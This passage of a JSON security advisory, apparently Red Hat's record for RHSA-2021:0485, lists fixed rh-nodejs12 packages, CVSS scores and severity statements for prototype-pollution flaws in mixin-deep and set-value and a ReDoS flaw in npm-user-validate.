"7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-mixin-deep: prototype pollution in function mixin-deep" }, { "cve": "CVE-2019-10747", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2019-08-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1795479" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-set-value. The function mixin-deep can be tricked into adding or modifying properties of Object.prototype using any of the constructor, prototype, or _proto_ payloads. The highest threat from this vulnerability is to data confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-set-value: prototype pollution in function set-value", "title": "Vulnerability summary" }, { "category": "other", "text": "While OpenShift Container Platform (OCP) contains the affected nodejs-set-value code, it\u0027s added as a dependency of Kibana 5. Similar issue about prototype pollution [1] have been fixed, but no known attack vector was found, so we\u0027re rating this issue as Low for OCP. \n\nIn Red Hat Software Collections and Red Hat Enterprise Linux 8, nodejs-set-value is bundled into nodejs-nodemon, and is not meant to be accessed outside of that package. Within nodemon, this flaw is rated with a Low severity.\n\nOpenShift distributed tracing bundles vulnerable version of Nodejs set-value package, however the components are protected by OpenShift OAuth, hence the impact by this vulnerability is reduced to LOW.\n\n[1] CVE-2019-10744 https://www.elastic.co/community/security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-10747" }, { "category": "external", "summary": "RHBZ#1795479", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1795479" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-10747", "url": "https://www.cve.org/CVERecord?id=CVE-2019-10747" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-10747", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10747" } ], "release_date": "2019-06-20T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-11T13:37:42+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0485" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-set-value: prototype pollution in function set-value" }, { "cve": "CVE-2020-7754", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-10-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1892430" } ], "notes": [ { "category": "description", "text": "This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Hat Enterprise Linux 8 and Software Collections, `npm-user-validate` is used exclusively for `npm`. As a result, this vulnerability is considered Low in such a context.\n\nIn OpenShift Container Platform (OCP) 3.11 and 4.4 the kibana package has been marked Low (similar to RHEL8) as it is primarily used for npm and is protected via OpenShift OAuth. Additionally, whilst OCP 4.4 does deliver the kibana package, due to the code changing to container first content, it has been marked as wontfix at this time and may be fixed in a future release. \n\nAdditionally, the openshift4/ose-logging-kibana6 container is not represented on the CVE page as it gets npm from the Red Hat Software Collections and as such the ose-logging-kibana6 container will be updated when the rh-nodejs10-nodejs package is.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", 